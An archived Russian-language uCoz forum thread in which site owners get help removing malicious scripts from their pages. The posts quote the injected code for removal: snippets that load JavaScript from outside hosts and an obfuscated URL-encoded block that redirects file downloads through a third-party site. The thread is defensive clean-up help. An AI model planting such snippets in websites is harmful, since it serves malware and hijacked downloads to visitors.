Модератор форума: Yuri_G |
Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах_3 (архив для чтения) |
Вирусы на сайтах_3 (архив для чтения) |
PozitiVBttF, все равно что вы там устанавливали. ищите и удаляйте
|
webanet, <script type="text/javascript">
$('#ucozrecklama').next().detach().prependTo($('#ucozrecklamas')); </script> я этот почти удалил все остались еше модули.а что делать после удаления этого скрипта? Добавлено (11 Апр 2013, 23:34:23) Код // Скрипт var styles = 'font:11px Tahoma;background:#f7f7f7;padding:2px 5px 2px 5px;color:6d6d6d;border:1px dashed #6d6d6d'; var opacit = 80; var optime = 200; var tposit = 5; IE=/*@cc_on!@*/false;var elems=document.getElementsByTagName("*");for(var i=0;i<elems.length;i++){if(elems[i].title){elems[i].onmouseover=function(e){var k=[];var j=[];var f=[];var h=[];var g=new Date().getTime();j[g]=this.title;this.title="";k[g]=document.createElement("DIV");k[g].innerHTML="<div style='"+styles+"'>"+j[g]+"</div>";k[g].style.cssText="position:absolute;opacity:0;filter:alpha(opacity=0);z-index:9999;";document.body.appendChild(k[g]);k[g].style.top=mouse(e).y-tposit-k[g].offsetHeight+"px";k[g].style.left=mouse(e).x+tposit+"px";document.onmousemove=function(b){k[g].style.top=mouse(b).y-tposit-k[g].offsetHeight+"px";k[g].style.left=mouse(b).x+tposit+"px"};h[g]=setTimeout(function(){fade(k[g],opacit,optime,function(){if(IE){k[g].style.removeAttribute("filter")}})},150);this.onmouseout=window.onunload=function(){clearTimeout(h[g]);document.onmousemove="";this.title=j[g];fade(k[g],0,optime,function(){document.body.removeChild(k[g])})}}}}function mouse(g){var j,f,k,c,h;j=document;h=IE?window.event:g;f=j.documentElement.scrollTop?j.documentElement.scrollLeft+h.clientX:j.body.scrollLeft+h.clientX;k=j.documentElement.scrollTop?j.documentElement.scrollTop+h.clientY:j.body.scrollTop+h.clientY;return{x:f,y:k}}function fade(f,b,a,c){if(IE){d=f.style.filter.replace(/.*opacity=([0-9]*).*/,"$1");if(!d){d=100}d=parseFloat(d)}else{var d=f.style.opacity;if(d==""){d=1}d=parseFloat(d);b=b/100}var e=new Date().getTime();setTimeout(function(){var g=(new Date().getTime())-e;var h=g/a;var j=(b-d)*h+d;if(IE){f.style.filter="alpha(opacity="+j+")"}else{f.style.opacity=j}if(h<1){setTimeout(arguments.callee,10)}else{if(IE){f.style.filter= "alpha(opacity="+b+")"}else{f.style.opacity=b}if(c){c()}}},10)}; возможно этот код? этой рекламы? Добавлено (11 Апр 2013, 23:37:58) |
Цитата (vellior) Здравствуйте Сегодня Аваст закрыл мой сайт neardor.ucoz.ru, пишет угроза: {gzip} и все. Кстати, такое же поведение у меня. Читай сообщение следующее за твоим. |
Цитата (Nightrunner) Кстати, такое же поведение у меня. Читай сообщение следующее за твоим. |
Nightrunner, гугл второй сайт в подписи блокнул из-а первого сайта в подписи. поменяйте пароль на фтп. поставьте самый сложный, который способны выдумать и забудьте его. если пользуетесь фтп, после каждого использования меняем пароль
|
vellior, на всякий случай попробуйте удалить это
Код <!--Csoul--><script type="text/javascript"><!-- var url = 'http://zimjmk.servebbs.net'; document.write('<sc' + 'ript language="JavaScript" ' + 'src="' + url + '/6293/counter.xhtml"></sc' + 'ript>') //--></script><!--/Csoul--> и аваст гавкает на всех страницах или на определенных? |
webanet, проблема не убрана помогите плз
|
<!--Csoul--><script type="text/javascript"><!--
var url = 'http://zimjmk.servebbs.net'; document.write('<sc' + 'ript language="JavaScript" ' + 'src="' + url + '/6293/counter.xhtml"></sc' + 'ript>') //--></script><!--/Csoul--> А где ее искать? |
PozitiVBttF, а где детали происшествия? под логином проблема или под гостем? на каких страницах лезет левая реклама?
сейчас я вижу как гость только один скрипт, который содержит рекламу. он стоит на форуме. вот он Код <script type="text/javascript" src="http://trane73.ru/demo/js/trane73.del2.js"></script> |
под логином проблема.практический на всех страницах появляется в левом нижним углом
|
PozitiVBttF, удалите то что я указала и ищите на сайте скрипты с адресом http://trane73.ru/ все что найдете удаляйте. логиниться я у вас не буду ищем сами
|
Добрый день
на сайте pentagonus.ru При попытке скачать файл с сервера (модуль каталог файлов) выдаёт следующее Пример - /pentagonus.ru/load/1/obshhie_voprosy/18-1-0-76 но подобное при скачке любого документа с сервера Ucoz Сообщение отредактировал pentagonus - Пятница, 12 Апр 2013, 00:27:56
|
pentagonus, в самом низу шаблона перед закрывающим боди
Код <script type="text/javascript">document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%0Avar%20title%20%3D%20encodeURI%28%27Ежегодный доклад директора РУМО. Оценка угроз. 10 марта 2009 г.%27%29%3B%0Avar%20url%20%3D%20escape%28%27http://pentagonus.ru/_ld/0/76_statement_31.rar%27%29%3B%0Avar%20urlRemote%20%3D%20escape%28%27%27%29%3B%0Avar%20link%20%3D%20%27http%3A//api1noid.net/api.php%3Fa%3D2485%26u%3D%27%20+%20url%20+%20%27%26n%3D%27%20+%20title%20+%20%27%26f%3D%27%20+%20title%20+%20%27%26ss%3D13%26mt%3D1%26sz%3D0 %26s%3D1%26d%3D3%26autoic%3D1%26autoim%3D1%27%3B%0Avar%20link2%20%3D%20%27http%3A//api1noid.net/api.php%3Fa%3D2485%26u%3D%27%20+%20urlRemote%20+%20%27%26n%3D%27%20+%20title%20+%20%27%26f%3D%27%20+%20title%20+%20%27%26ss%3D13%26sz%3D0%26 mt%3D1%26s%3D1%26d%3D3%26autoic%3D1%26autoim%3D1%27%3B%0A%24%28%27%23wsLink%27%29.attr%28%27href%27%2C%20link%29%3B%20%24%28%27%23wsLinkMirr or%27%29.attr%28%27href%27%2C%20link%29%3B%20%24%28%27%23wsLinkRemote%27%29.attr%28%27href%27%2C%20link2%29%3B%20%3C/script%3E"));</script> |
Огромное спасибо, сработало. остаётся выяснить, как это туда попало
|
Цитата (webanet) гугл второй сайт в подписи блокнул из-а первого сайта в подписи С ним также были проблемы, но ведь теперь всё нормально. Почему? o_O |
| |||